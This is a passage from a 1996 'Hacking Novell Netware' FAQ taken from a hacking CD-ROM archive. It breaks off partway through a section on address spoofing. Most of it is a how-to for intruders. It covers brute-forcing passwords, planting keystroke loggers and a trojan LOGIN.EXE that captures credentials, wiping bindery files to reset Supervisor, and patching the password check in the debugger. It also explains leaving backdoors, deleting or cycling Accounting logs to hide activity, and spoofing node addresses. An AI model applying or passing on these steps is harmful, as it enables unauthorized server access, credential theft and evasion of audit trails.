home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersguides-&-software / novellhack.txt < prev    next >
Text File  |  1996-04-14  |  74KB  |  1,618 lines

  1.  
  2.  
  3.  
  4.  
  5. From the Nomad Mobile Research Centre:
  6.  
  7.              Frequently Asked Questions
  8.               "Hacking Novell Netware"
  9.  
  10.                    Beta Version 1
  11.  
  12.               Compiled by Simple Nomad
  13.  
  14.  
  15. Contributions (and thanks to):  
  16.  
  17. The LAN God    mark_motley@candle.com
  18. Teiwaz         teiwaz@wolfe.net
  19.  
  20. Also thanks to Fauzan and BioHazard
  21.  
  22. And many, many others who requested anonymity or didn't realize they were
  23. contributing ;-)
  24.  
  25. Tech Support (and special thanks to):
  26.  
  27. itsme - infamous Netware Netherlands hack fame
  28.  
  29. Coming in the future to this FAQ - Netware API info!!
  30.  
  31. ---------------------------------------------------------------------------
  32. ---------------------------------------------------------------------------
  33.  
  34. Contents
  35.  
  36. ---------------------------------------------------------------------------
  37.  
  38. Section 00
  39.  
  40. General Info
  41.  
  42. 00-1. What is this "FAQ" for?
  43. 00-2. What is the origin of this FAQ and how do I add to it?
  44. 00-3. Is this FAQ available by anonymous FTP?
  45.  
  46. ---------------------------------------------------------------------------
  47.  
  48. Section 01
  49.  
  50. Getting Access to Accounts
  51.  
  52. 01-1. How do I access the password file in Novell Netware?
  53. 01-2. How do I crack Novell Netware passwords?
  54. 01-3. What are common accounts and passwords in Novell Netware?
  55. 01-4. How can I figure out valid account names on Novell Netware?
  56. 01-5. What is the "secret" method to gain Supervisor access Novell used to teach
  57. in CNE classes?
  58. 01-6. What is the cheesy way to get Supervisor access?
  59. 01-7. How do I leave a backdoor?
  60. 01-8. Can sniffing packets help me break in?
  61. 01-9. What is Packet Signature and how do I get around it?
  62. 01-10. How do I use SETPWD.NLM? 
  63. 01-11. What's the "debug" way to disable passwords?
  64.  
  65. ---------------------------------------------------------------------------
  66.  
  67. Section 02
  68.  
  69. Other Security Items
  70.  
  71. 02-1. What is Accounting?
  72. 02-2. How do I defeat Accounting?
  73. 02-3. What is Intruder Detection?
  74. 02-4. What are station/time restrictions?
  75. 02-5. How do I spoof my node or IP address?
  76. 02-6. How do I defeat console logging?
  77.  
  78.  
  79. ---------------------------------------------------------------------------
  80.  
  81. Section 03
  82.  
  83. File and Directory Access
  84.  
  85. 03-1. How can I see hidden files and directories?
  86. 03-2. How do I defeat the execute-only flag?
  87. 03-3. How can I hide my presence after altering files?
  88. 03-4. What is a Netware-aware trojan?
  89. 03-5. What are Trustee Directory Assignments?
  90. 03-6. Are there any default Trustee Assignments that can be exploited?
  91.  
  92. ---------------------------------------------------------------------------
  93.  
  94. Section 04
  95.  
  96. Miscellaneous Info on Netware
  97.  
  98. 04-1. Why can't I get through the 3.x server to another network via TCP/IP?
  99. 04-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
  100. 04-3. How can I login without running the System Login Script?
  101. 04-4. How do I remotely reboot a Netware 3.x file server?
  102. 04-5. How can I abend a Netware server? And why?
  103. 04-6. What is interesting about Netware 4.x's licensing?
  104.  
  105. ---------------------------------------------------------------------------
  106.  
  107. Section 05
  108.  
  109. Resources
  110.  
  111. 05-1. What are some Netware FTP locations?
  112. 05-2. Can I get files without FTP?
  113. 05-3. What are some Netware WWW locations?
  114. 05-4. What printed material might be helpful?
  115. 05-5. Where can I get the files mentioned in this FAQ?
  116. 05-6. What are some good books for Netware?
  117.  
  118. ---------------------------------------------------------------------------
  119.  
  120. Section 06
  121.  
  122. Netware APIs
  123.  
  124. 06-1. Where can I get the Netware APIs?
  125.  
  126. ---------------------------------------------------------------------------
  127.  
  128. Section 07
  129.  
  130. For Administrators Only
  131.  
  132. 07-1. How do I secure my server?
  133. 07-2. I'm an idiot. Exactly how do hackers get in?
  134.  
  135. ---------------------------------------------------------------------------
  136. ---------------------------------------------------------------------------
  137.  
  138. Section 00
  139.  
  140. General Info
  141.  
  142. ---------------------------------------------------------------------------
  143.  
  144. 00-1. What is this "FAQ" for?
  145.  
  146. This FAQ contains information about hacking Novell Netware. It is intented to
  147. show what and how regarding hacking on Netware, and by illustrating this in
  148. explicit detail show how sys admins can improve security and prevent break-ins. 
  149. Most of the information in this FAQ was compiled and collected from various 
  150. sources freely available on the Internet. In fact, most of the information here 
  151. is OLD info for serious Netware hackers. Some of the info was collected from 
  152. these serious Netware hackers, and still more was collected from "tiger team" 
  153. security sweeps that I have been involved in.
  154.  
  155. You will also find hints and generally good ideas for improving and/or expanding 
  156. an existing system. This FAQ is a good reference for sys admins as well as
  157. hackers. 
  158.  
  159. ---------------------------------------------------------------------------
  160.  
  161. 00-2. What is the origin of this FAQ and how do I add to it?
  162.  
  163. Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames
  164. about typos, the "that's not right" one liners will be ignored. If you wish to
  165. contribute corrections please include your research and source of facts. Also
  166. if you wish to add your information, I will include it if I can include your
  167. email address, unless I can verify the info independently. This way if someone
  168. has questions, they can bug you, not me.
  169.  
  170. ---------------------------------------------------------------------------
  171.  
  172. 00-3. Is this FAQ available by anonymous FTP or WWW?
  173.  
  174. Look for it in jumper.mcc.ac.uk in the /pub/security/netware directory, or
  175. (very soon) at http://resudox.net/bio/mainpage.html.
  176.  
  177. ---------------------------------------------------------------------------
  178. ---------------------------------------------------------------------------
  179.  
  180. Section 01
  181.  
  182. Getting Access to Accounts
  183.  
  184. ---------------------------------------------------------------------------
  185.  
  186. 01-1. How do I access the password file in Novell Netware?
  187.  
  188. Contrary to not-so-popular belief, access to the password file in Netware is
  189. not like Unix - the password file isn't in the open. All objects and their
  190. properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
  191. database in 4.x. An example of an object might be a printer, a group, an
  192. individual's account etc. An example of an object's properties might include
  193. an account's password or full user name, or a group's member list or full
  194. name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
  195. and System, and these files are located on the SYS: volume in the SYSTEM
  196. subdirectory. Their names are as follows:
  197.  
  198.     Netware version         File Names
  199.     ---------------         ----------
  200.     2.x                     NET$BIND.SYS, NET$BVAL.SYS
  201.     3.x                     NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
  202.  
  203. The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
  204. in 2.x and 3.x respectively.
  205.  
  206. In Netware 4.x, the files are physically located in a different location than
  207. on the SYS: volume. However, by using the RCONSOLE utility and using the
  208. Scan Directory option, you can see the files in SYS:_NETWARE:
  209.  
  210.     File                    What it is
  211.     --------------          --------------------------
  212.     VALUE.NDS               Part of NDS
  213.     BLOCK.NDS               Part of NDS
  214.     ENTRY.NDS               Part of NDS
  215.     PARTITIO.NDS            Type of NDS partition (replica, master, etc.)
  216.     MLS.000                 License
  217.     VALLINCEN.DAT           License validation
  218.  
  219. Here is another way to view these files, and potentially edit them. After 
  220. installing NW4 on a NW3 volume, reboot the server with a 3.x SERVER.EXE. On 
  221. volume SYS will be the _NETWARE directory. SYS:_NETWARE is hidden better on 
  222. 4.1 than 4.0x, but in 4.1 you can still see the files by scanning directory 
  223. entry numbers using NCP calls (you need the APIs for this) using function 
  224. 0x17 subfunction 0xF3.
  225.  
  226. ---------------------------------------------------------------------------
  227.  
  228. 01-2. How do I crack Novell Netware passwords?
  229.  
  230. There are a few ways to approach this. First, we'll assume Intruder Detection
  231. is turned off. We'll also assume unencrypted passwords are allowed. Hopefully
  232. you won't have to deal with packet signature (see 01-9 below) Then we'll assume 
  233. you have access to the console. Finally we'll assume you can plant some kind of
  234. password catcher. Access to a sniffer might help. These are a lot of ifs.
  235.  
  236. If Intruder Detection is off, you can just guess the password until you get
  237. it. This can be automated by writing a program that continually guesses
  238. passwords, or by using a program that does just that. One program that I am 
  239. aware of is NOVELBFH.EXE (for version 3.x only). This program will try passwords
  240. like aa, ab, ac and so on until every legal character combination has been tried.
  241. You will eventually get the password. However this assumes you have 1) a lot of
  242. time since it takes a second or two for each try (more on a dial-up link), and
  243. 2) access to a machine that will run one of these programs for hours, even days.
  244. And if Intruder Detection is on you will be beeping the System Console every
  245. couple of seconds and time-stamping your node address to the File Server Error
  246. Log.
  247.  
  248. Encrypted passwords is Novell's way of protecting passwords from sniffers.
  249. Since older versions of Netware (2.15c) sent passwords as plain text over the
  250. wire, a sniffer could see the password as it went by. To secure things,
  251. Novell gave the administrator a way to control this. Later versions of the
  252. LOGIN.EXE program would encrypt the password before transmitting it across
  253. the wire to the server. But before this could happen, the shell (NETX) had
  254. to be updated. Since some locations had to have older shells and older
  255. versions of LOGIN.EXE to support older equipment, the administrator has the
  256. option of allowing unencrypted passwords to access the server. This is done
  257. by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
  258. to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
  259. the server console every attempt! Fortunately most sites turn this switch on to
  260. support some old device.
  261.  
  262. If you have access to the console, either by standing in front of it or by
  263. RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
  264. Just load the NLM and pass it command line parameters:
  265.  
  266.     NLM             Account(s) reset        Netware version(s) supported
  267.     ------------    -----------------       ----------------------------
  268.     SETSPASS.NLM    SUPERVISOR              3.x
  269.     SETSPWD.NLM     SUPERVISOR              3.x, 4.x
  270.     SETPWD.NLM      any valid account       3.x, 4.x
  271.  
  272. See 01-10 for more SETPWD.NLM info.
  273.  
  274. If you can plant a password catcher or keystroke reader, you can get them
  275. this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
  276. normally you will not have access to put a file in that directory. The best
  277. place to put a keystroke capture program is in the workstation's path, with
  278. the ATTRIB set as hidden. The advantage is that you'll get the password and
  279. Netware won't know you swiped it. The disadvantage is getting access to the
  280. machine to do this. The very best place to put one of these capture programs
  281. is on a common machine, like a pcAnywhere box, which is used for remote access.
  282. Many locations will allow pcAnywhere access to a machine with virtually no 
  283. software on it, and control security access to the LAN by using Netware's 
  284. security features. Uploading a keystroke capture program to a machine like 
  285. this defeats this.
  286.  
  287. If the system is being backed up via a workstation, this can be used as a
  288. good entry point.  These workstations have to have supe equiv to back up the 
  289. bindery and other system files.  If you can access this workstation or use 
  290. the backup systems user account name then you can get supe level login.
  291.  
  292. itsme, the notorious Netherlands Netware hacker, developed KNOCK.EXE by
  293. rewriting one byte of ATTACH.EXE to try without a password to get into a
  294. server. KNOCK.EXE utilitzes a bug that allows a non-password attach to get
  295. in. This works on versions of Netware earlier than 2.2, and 3.11. Later 
  296. versions have the bug fixed. Given enough time you will get in.
  297.  
  298. Another alternative is the replacement LOGIN.EXE by itsme. This jewel, 
  299. coupled with PROP.EXE, will create a separate property in the bindery on a
  300. 2.x or 3.x server that contains the passwords. Here is the steps to use 
  301. these powerful tools:
  302.  
  303.  - Gain access to a workstation logged in as Supervisor or equivalent (or
  304. use another technique described elsewhere for getting this type of access)
  305.  
  306.  - Run the PROP.EXE file with a -C option. This creates the new property for
  307. each bindery object. Remember, you must be a Supe for this step.
  308.  
  309.  - Replace the LOGIN.EXE in the SYS:LOGIN directory with itsme's. Be sure
  310. to flag it SRO once replaced.
  311.  
  312.  - Now it is set. Keep PROP.EXE on a floppy, and check the server with any
  313. valid login, Supervisor or not, after a week or two.
  314.  
  315.  - To check the passwords captured, type PROP -R after your logged in. You
  316. can redirect it to a file or printer. A list of accounts and passwords,
  317. valid and working, are yours.
  318.  
  319.  - Don't forget to hide your presence! See section 03-3 for details.
  320.  
  321. ---------------------------------------------------------------------------
  322.  
  323. 01-3. What are common accounts and passwords in Novell Netware?
  324.  
  325. Out of the box Novell Netware has the following default accounts -
  326. SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All
  327. of these have no password to start with. Virtually every installer quickly
  328. gives SUPERVISOR and ADMIN a password. However, many locations will create 
  329. special purpose accounts that have easy-to-guess names, some with no
  330. passwords. Here are a few and their typical purposes:
  331.  
  332.     Account         Purpose
  333.     ----------      ------------------------------------------------------
  334.     PRINT           Attaching to a second server for printing
  335.     LASER           Attaching to a second server for printing
  336.     HPLASER         Attaching to a second server for printing
  337.     PRINTER         Attaching to a second server for printing
  338.     LASERWRITER     Attaching to a second server for printing
  339.     POST            Attaching to a second server for email
  340.     MAIL            Attaching to a second server for email
  341.     GATEWAY         Attaching a gateway machine to the server
  342.     GATE            Attaching a gateway machine to the server
  343.     ROUTER          Attaching an email router to the server
  344.     BACKUP          May have password/station restrictions (see below), used
  345.             for backing up the server to a tape unit attached to a
  346.             workstation. For complete backups, Supervisor equivalence
  347.             is required.
  348.     WANGTEK         See BACKUP
  349.     FAX             Attaching a dedicated fax modem unit to the network
  350.     FAXUSER         Attaching a dedicated fax modem unit to the network
  351.     FAXWORKS        Attaching a dedicated fax modem unit to the network
  352.     TEST            A test user account for temp use
  353.  
  354. This should give you an idea of accounts to try if you have access to a
  355. machine that attaches to the server. A way to "hide" yourself is to give
  356. GUEST or USER_TEMPLATE a password. Occassionally admins will check up on
  357. GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about
  358. USER_TEMPLATE until itsme reminded me.
  359.  
  360. A common mistake regarding RCONSOLE passwords is to use a switch to use
  361. only the Supervisor password. It works like this:
  362.  
  363. LOAD REMOTE /P=
  364.  
  365. instead of 
  366.  
  367. LOAD REMOTE RCONPASSWORD
  368.  
  369. The admin believes /P= turns off everything except the Supe password for
  370. RCONSOLE. In fact the password is just set to /P= which will get you in!
  371. The second most common mistake is using -S.
  372.  
  373. ---------------------------------------------------------------------------
  374.  
  375. 01-4. How can I figure out valid account names on Novell Netware?
  376.  
  377. Any limited account should have enough access to allow you to run SYSCON,
  378. located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter.
  379. Now go to User Information and you will see a list of all defined accounts.
  380. You will not get much info with a limited account, but you can get the
  381. account and the user's full name.
  382.  
  383. If your in with any valid account, you can run USERLST.EXE and get a list
  384. of all valid account names on the server.
  385.  
  386. If you don't have access (maybe the sys admin deleted the GUEST account,
  387. a fairly common practice), you can't just try any account name at the LOGIN
  388. prompt. It will ask you for a password whether the account name is valid or
  389. not, and if it is valid and you guees the wrong password, you could be
  390. letting the world know what you're up to if Intruder Detection is on. But
  391. there is a way to determine if an account is valid.
  392.  
  393. From a DOS prompt use a local copy (on your handy floppy you carry
  394. everywhere) of MAP.EXE. After you've loaded the Netware TSRs up through
  395. NETX or VLM, Try to map a drive using the server name and volume SYS:.
  396. For example:
  397.  
  398.     MAP G:=TARGET_SERVER/SYS:APPS <enter>
  399.  
  400. Since you are not logged in, you will be prompted for a login ID. If it
  401. is a valid ID, you will be prompted for a password. If not, you will
  402. immediately receive an error. Of course, if there is no password for the
  403. ID you use you will be attached and mapped to the server. You can do the
  404. same thing with ATTACH.EXE:
  405.  
  406.     ATTACH TARGET_SERVER/loginidtotry <enter>
  407.  
  408. The same thing will happen as the MAP command. If valid, you will be
  409. prompted for a password. If not, you get an error.
  410.  
  411. Another program to check for valid users and the presence of a password is
  412. CHKNULL.EXE by itsme. This program checks for users and whether they have
  413. a password assigned.
  414.  
  415. ---------------------------------------------------------------------------
  416.  
  417. 01-5. What is the "secret" method to gain Supervisor access Novell used to teach 
  418. in CNE classes?
  419.  
  420. Before I start this section, let me recommend another solution, my God, ANY
  421. other solution is better than this! If you are running 3.x, jump to the end of 
  422. this section.
  423.  
  424. The secret method is the method of using a DOS-based sector editor to edit the 
  425. entry in the FAT, and reset the bindery to default upon server reboot. This gives 
  426. you Supervisor and Guest with no passwords. The method was taught in case you 
  427. lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts 
  428. created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.
  429.  
  430. While you get a variety of answers from Novell about this technique, from it 
  431. doesn't work to it is technically impossible, truth be it it can be  done. Here 
  432. are the steps, as quoted from comp.os.netware.security, with my comments in 
  433. [brackets]:
  434.  
  435. [start of quote]
  436. A Netware Server is supposed to be a very safe place to keep your files. Only
  437. people with the right password will have access to the data stored there. The
  438. Supervisor (or Admin) user's password is usually the most well kept secret in
  439. the company, since anyone that has that code could simply log to the server and 
  440. do anything he/she wants.
  441.  
  442. But what happens if this password is lost and there's no user that is 
  443. security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process,
  444. see 01-10 below - S.N.] What happens if the password system is somehow damaged
  445. and no one can log to the network? According to the manual, there's simply no 
  446. way out. You would have to reinstall the server and try to find your most recent 
  447. backup. 
  448.  
  449. Fortunately, there is a very interesting way to gain complete access to a Netware
  450. server without knowing the Supervisor's (or Admin's) password. You may imagine
  451. that you would have to learn complex decryption techniques or even type in a long
  452. C program, but that's not the case. The trick is so simple and generic that it
  453. will work the same way for Netware 2.x, 3.x and 4.x. 
  454.  
  455. The idea is to fool Netware to think that you have just installed the server and
  456. that no security system has been estabilished yet. Just after a Netware 2.x or
  457. 3.x server is installed, the Supervisor's password is null and you can log in
  458. with no restriction. Netware 4.x works slightly differently, but it also allows
  459. anyone to log in after the initial installation, since the installer is asked to
  460. enter a password for the Admin user.
  461.  
  462. But how can you make the server think it has just been installed  without
  463. actually reinstalling the server and losing all data on the disk? Simple. You
  464. just delete the files that contain the security system. In Netware 2.x, all
  465. security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS).
  466. Netware 3.x stores that information in three files (NET$OBJ.SYS, NET$VAL.SYS and
  467. NET$PROP.SYS). The all new Netware 4.x system stores all login names and 
  468. passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS
  469. and UNINSTAL.NDS [This last file may not be there, don't worry - S.N.]).
  470.  
  471. One last question remains. How can we delete these files if we don't have access
  472. to the network, anyway? The answer is, again, simple. Altough the people from
  473. Novell did a very good job encrypting passwords, they let all directory
  474. information easy to find and change if you can access the server's disk directly,
  475. using common utilities like Norton's Disk Edit. Using this utility as an example,
  476. I'll give a step-by-step procedure to make these files vanish. All you need is a
  477. bootable DOS disk,  Norton Utilities' Emergency Disk containing the DiskEdit
  478. program and some time near the server.
  479.  
  480. 1. Boot the server and go to the DOS prompt. To do this, just let the network
  481. boot normally and then use the DOWN and EXIT commands. This procedure does not
  482. work on old Netware 2.x servers and in some installations where DOS has been 
  483. removed from memory. In those cases, you'll have to use a DOS bootable disk.
  484.  
  485. 2. Run Norton's DiskEdit utility from drive A:
  486.  
  487. 3. Select "Tools" in the main menu and then select "Configuration". At the
  488. configuration window, uncheck the "Read-Only" checkbox. And be very careful with
  489. everything you type after this point.
  490.  
  491. 4. Select "Object" and then "Drive". At the window, select the C: drive and make
  492. sure you check the button "physical drive". After that, you'll be looking at your
  493. physical disk and you be able to see (and change) everything on it.
  494.  
  495. 5. Select "Tools" and then "Find". Here, you'll enter the name of the file you 
  496. are trying to find. Use "NET$BIND" for Netware 2,  "NET$PROP.SYS"  for  Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find these strings in a
  497. place that is not the Netware directory. If the file names are not all near each
  498. other and proportionaly separated by some unreadable codes (at least 32 bytes
  499. between them), then you it's not the place we are looking for. In that case, 
  500. you'll have to keep searching by selecting "Tools" and then "Find again". [In
  501. Netware 3.x, you can change all occurences of the bindery files and it should
  502. still work okay, I've done it before. - S.N.]
  503.  
  504. 6. You found the directory and you are ready to change it. Instead of deleting 
  505. the files, you'll be renaming them. This will avoid problems with the directory
  506. structure (like lost FAT chains). Just type "OLD" over the existing "SYS" or
  507. "NDS" extension. Be extremely careful and don't change anything else.
  508.  
  509. 7. Select "Tools" and then "Find again". Since Netware store the directory
  510. information in two different places, you have to find the other copy and change 
  511. it the same way. This will again prevent directory structure problems.
  512.  
  513. 8. Exit Norton Disk Edit and boot the server again. If you're running Netware 2 
  514. or 3, your server would be already accessible. Just go to any station and log in 
  515. as user Supervisor. No password will be asked. If you're running Netware 4, there
  516. is one last step.
  517.  
  518. 9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt) 
  519. and select the options to install the Directory Services. You be prompted for the
  520. Admin password while doing this. After that, you may go to any station and log in
  521. as user Admin, using the password that you have selected.
  522.  
  523. What I did with Norton's Disk Edit could be done with any disk editing utility 
  524. with a "Search" feature. This trick has helped me save many network supervisors 
  525. in the last years. I would just like to remind you that no one should break into
  526. a netware server unless authorized to do it by the company that owns the server. 
  527. But you problably know that already.
  528. [end of quote]
  529.  
  530. I actually had this typed up but kept changing it, so I stole this quote from
  531. the newsgroup to save me retyping ;-)
  532.  
  533. Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and
  534. downs the server. Reboot and you have Supe and Guest, no password.
  535.  
  536. ---------------------------------------------------------------------------
  537.  
  538. 01-6. What is the cheesy way to get Supervisor access?
  539.  
  540. The cheesy way is the way that will get you in, but it will be obvious to the 
  541. server's admin that the server has been compromised. This technique works for 
  542. 3.11.
  543.  
  544. Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following 
  545. things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account 
  546. on the server is made a supe equivalent, and 3) the sys admin is going to know 
  547. very quickly something is wrong. What the admin will do is remove the supe rights 
  548. from all accounts that are not supposed to have it and change the Supervisor 
  549. password back. The only thing you can do is leave a backdoor for yourself (see 
  550. next question).
  551.  
  552. ---------------------------------------------------------------------------
  553.  
  554. 01-7. How do I leave a backdoor?
  555.  
  556. Once you are in, you want to leave a way back with supe equivalency. You can use 
  557. SUPER.EXE, written for the express purpose of allowing the non-supe user to 
  558. toggle on and off supe equivalency. If you use the cheesy way in (previous 
  559. question), you turn on the toggle before the admin removes your supe 
  560. equivalency. If you gain access to a supe equivalent account, give Guest supe 
  561. equivalency and then login as Guest and toggle it on. Now get back in as the 
  562. original supe account and remove the supe equivalency. Now Guest can toggle on 
  563. supe equivalency whenever it's convenient.
  564.  
  565. Of course Guest doesn't have to be used, it could be another account, like an
  566. account used for e-mail administration or an e-mail router, a gateway's account, 
  567. you get the idea.
  568.  
  569. Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix 
  570. will give away that an account has been altered at the bindery level, but the 
  571. only way for an admin to clear the error is to delete and rebuild the account.
  572.  
  573. Another backdoor is outlined in section 01-2 regarding the replacement LOGIN.EXE 
  574. and PROP.EXE
  575.  
  576. ---------------------------------------------------------------------------
  577.  
  578. 01-8. Can sniffing packets help me break in?
  579.  
  580. Yes. If a user is logging in and the password is being transmitted to the server 
  581. unencrypted, it will show up as plain text in the trace. If the site uses telnet 
  582. and ftp, capturing those password will come in handy. Outside of gaining access 
  583. to another system, many users will make their passwords the same across all 
  584. systems.
  585.  
  586. For a list of DOS-based sniffers, see the alt.2600/#hack FAQ. I personally
  587. prefer the Network General Sniffer ;-)
  588.  
  589. You can use a brute force cracker on captured encrypted passwords. As I have
  590. more tools and details, I will provide them here.
  591.  
  592. ---------------------------------------------------------------------------
  593.  
  594. 01-9. What is Packet Signature and how do I get around it?
  595.  
  596. Packet signatures works by using an intermediate step during the encrypted
  597. password login call, to calculate a 64-bit signature.  This block is never
  598. transmitted over the wire, but it is used as the basis for a
  599. cryptographically strong signature ("secure hash") on the most important
  600. part of each NCP packet exchange.
  601.  
  602. A signed packet can indeed be taken as proof sufficient that the packet came
  603. from the claimed PC.
  604.  
  605. NCP Packet Signature is Novell's answer to the work of the folks in the
  606. Netherlands in hacking Netware. The idea behind it is to prevent forged
  607. packets and unauthorized Supervisor access. It is an add-on option in 3.11,
  608. but a part of the system with 3.12 and 4.x. Here are the signature levels
  609. at the client and server:
  610.  
  611. Packet Signature Option and meaning:
  612. 0 = Don't do packet signatures
  613. 1 = Do packet signatures if required
  614. 2 = Do packet signatures if you can but don't if the other end doesn't support
  615. them
  616. 3 = Require packet signatures
  617.  
  618. You can set the same settings at the workstation server. The default for packet
  619. signatures is 2 at the server and client. If you wish to use a tool like
  620. HACK.EXE, try setting the signature level at 0 on the client by adding
  621. Signature Level=0 in the client's NET.CFG. If packet signatures are required
  622. at the server you won't even get logged in, but if you get logged in, hack away.
  623.  
  624. If you wish to change the signature level at the server, use a set command at
  625. the server console:
  626.  
  627. SET NCP PACKET SIGNATURE OPTION=2
  628.  
  629. ---------------------------------------------------------------------------
  630.  
  631. 01-10. How do I use SETPWD.NLM?
  632.  
  633. You can load SETPWD at the console or via RCONSOLE. If you use RCONSOLE, use
  634. the Transfer Files To Server option and put the file in SYS:SYSTEM.
  635.  
  636. For 3.x:
  637. LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]
  638.  
  639. For 4.x:
  640. set bindery context = [context, e.g. hack.corp.us]
  641. LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword]
  642.  
  643. In 4.x the change is replicated so you have access to all the other servers
  644. in the tree. And don't forget, you must follow the password requirements in
  645. SYSCON for this to work. That is, if the account you are changing normally
  646. requires a 6 character password, then you'll need to supply a 6 character
  647. password.
  648.  
  649. ---------------------------------------------------------------------------
  650.  
  651. 01-11. What's the "debug" way to disable passwords?
  652.  
  653. You must be at the console to do this:
  654.  
  655. <left-shift><right-shift><alt><esc>     Enters debugger
  656. type "c VerifyPassword=B8 0 0 0 0 C3"
  657. type "g"
  658.  
  659. This disables the password checking. Now Supe won't ask for a password. To
  660. restore password checking from debugger, do this:
  661.  
  662. first type "d VerifyPassword 5" and write down the 5 byte response,
  663. then type  "c VerifyPassword=xx xx xx xx xx"
  664. then type  "g"
  665.  
  666. ---------------------------------------------------------------------------
  667. ---------------------------------------------------------------------------
  668.  
  669. Section 02
  670.  
  671. Other Security Items
  672.  
  673. ---------------------------------------------------------------------------
  674.  
  675. 02-1. What is Accounting?
  676.  
  677. Accounting is Novell's pain in the butt way to control and manage access to
  678. the server in a way that is "accountable". The admin set up charge rates for
  679. blocks read and written, service requests, connect time, and disk storage.
  680. The account "pays" for the service by being given some number, and the
  681. accounting server deduces for these items. How the account actually pays
  682. for these items (departmental billing, cash, whatever) you may or may not
  683. want to know about, but the fact that it could be installed could leave a
  684. footprint that you've been there.
  685.  
  686. Any valid account, including non-supe accounts, can check to see if 
  687. Accounting is turned on. Simply run SYSCON and try to access Accounting,
  688. if you get a message that Accounting is not installed, then guess what?
  689.  
  690. Since it is a pain to administer, many sys admins will turn it on simply
  691. to time-stamp each login and logout, track intruders, and include the
  692. node address and account name of each of these items.
  693.  
  694. ---------------------------------------------------------------------------
  695.  
  696. 02-2. How do I defeat Accounting?
  697.  
  698. Turn it off. And spoof your node address. Here's the steps -
  699.  
  700.  - Spoof your address (see below). Use a supe account's typical node
  701. address as your own.
  702.  
  703.  - If you are using a backdoor, activate it with SUPER.EXE.
  704.  
  705.  - Delete Accounting by running SYSCON, selecting Accounting, Accounting
  706. Servers, hitting the delete key, and answering yes when asked if you
  707. wish to delete accounting. The last entry in the NET$ACCT.DAT file will
  708. be your login time-stamped with the spoofed node address.
  709.  
  710.  - Now do what you will in the system. Use a different account if you
  711. like, it won't show up in the log file.
  712.  
  713.  - When done, login with the original account, run SYSCON and
  714. re-install Accounting. Immediately logout, and the next line in the
  715. NET$ACCT.DAT file will be your logout, showing a login and logout
  716. with the same account name, nice and neat.
  717.  
  718. If you can't spoof the address (some LAN cards don't allow it or require
  719. extra drivers you may not have), just turn off Accounting and leave it
  720. off or delete the NET$ACCT.DAT file located in the SYS:SYSTEM
  721. directory.
  722.  
  723. It should be noted that to turn off and on Accounting you need supe
  724. equivalent, but you don't need supe equivalence to spoof the address.
  725.  
  726. ---------------------------------------------------------------------------
  727.  
  728. 02-3. What is Intruder Detection?
  729.  
  730. Intruder Detection is Novell's way of tracking invalid password attempts. While 
  731. this feature is turned off by default, most sites practicing any type of security 
  732. will at minimum turn this feature on. There are several parameters to Intruder 
  733. Detection. First, there is a setting for how long the server will remember a bad 
  734. password attempt. Typically this is set to 30 minutes, but can be as short as 10 
  735. minutes of as long as 7 days. Then there is a setting for how many attempts will 
  736. lockout the account. This is usually 3 attempts, but can be as short as 1 or as 
  737. many as 7. Finally is the length the account is locked out. The default is 30 
  738. minutes but it can range from 10 minutes to 7 days.
  739.  
  740. When an Intruder Detection occurs, the server beeps and a time-stamped message is 
  741. displayed on the System Console with the account name that is now locked out and 
  742. the node address from where to attempt came from. This is also written to the 
  743. File Server Error Log. A Supervisor or equivalent can unlock the account before 
  744. it frees itself up, and the File Server Error Log can also be erased by a 
  745. Supervisor or equivalent.
  746.  
  747. In a large shop, it is not unusual to see Intruder Lockouts even on a daily 
  748. basis, and forgetting a password is a typical regular-user thing to do. Intruder 
  749. Lockouts on Supervisor or equivalent account is usually noticed. 
  750.  
  751. ---------------------------------------------------------------------------
  752.  
  753. 02-4. What are station/time restrictions?
  754.  
  755. Time restrictions can be placed on an account to limit the times in which
  756. an account can be logged in. In the account is already logged in and the
  757. time changes to a restricted time, the account is logged out. The 
  758. restriction can be per weekday down to the half hour. That means that if
  759. an admin wants to restrict an account from logging in except on Monday
  760. through Friday from 8-5, it can be done. Only Supervisor and equivalents
  761. can alter time restrictions. Altering the time at the workstation will
  762. not get you around time restrictions, only altering time at the server
  763. can change the ability to access.
  764.  
  765. Station restriction place a restriction on _where_ an account can be used.
  766. Restrictions can be to a specific token ring or ethernet segment, and can
  767. be specific down to the MAC layer address, or node address. The only way
  768. around a station restriction at the node address is to spoof the address
  769. from a workstation on the same segment or ring as the address you are
  770. spoofing. Like time restrictions, only Supervisor and equivalents
  771. can alter station restrictions.
  772.  
  773. ---------------------------------------------------------------------------
  774.  
  775. 02-5. How do I spoof my node or IP address?
  776.  
  777. This will depend greatly on what kind of network interface card (NIC) the
  778. workstation has, as to whether you can perform this function. Typically you
  779. can do it in the Link Driver section of the NET.CFG file by adding the
  780. following line - NODE ADDRESS xxxxxxxxxxxx where xxxxxxxxxxxx is the 12
  781. digit MAC layer address. This assumes you are using Netware's ODI drivers,
